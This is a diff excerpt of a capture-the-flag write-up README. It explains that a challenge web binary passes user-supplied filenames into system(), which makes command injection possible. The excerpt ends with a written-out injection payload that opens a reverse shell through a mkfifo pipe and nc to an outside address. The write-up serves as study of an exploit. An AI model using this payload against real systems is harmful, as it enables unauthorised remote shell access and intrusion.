welchbj/ctf/writeups/2020/CyberStakes/who-does-this-belong-to/readme.md

 I didn't spend a ton of time reversing or understanding the `diusweb` binary, as it is only a small part of this challenge.
 This binary powers the web interface that was the only publicly exposed part of this challenge, and serves as our initial access vector.

-The fundamental flaw in the `diusweb` binary is that, in order to compress user-uploaded files, it uses `system` to call the `dius` binary .
+The fundamental flaw in the `diusweb` binary is that, in order to compress user-uploaded files, it uses `system` to call the `dius` binary.
 However, it uses the unchanged user-specified filename when building the `dius` command that gets passed to `system`, so command injection is trivial.
 One of the provided hints let us know that `nc` is installed on the target, so we can pop a reverse shell with:

 ```sh
 ;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.254.20 5555 >/tmp/f;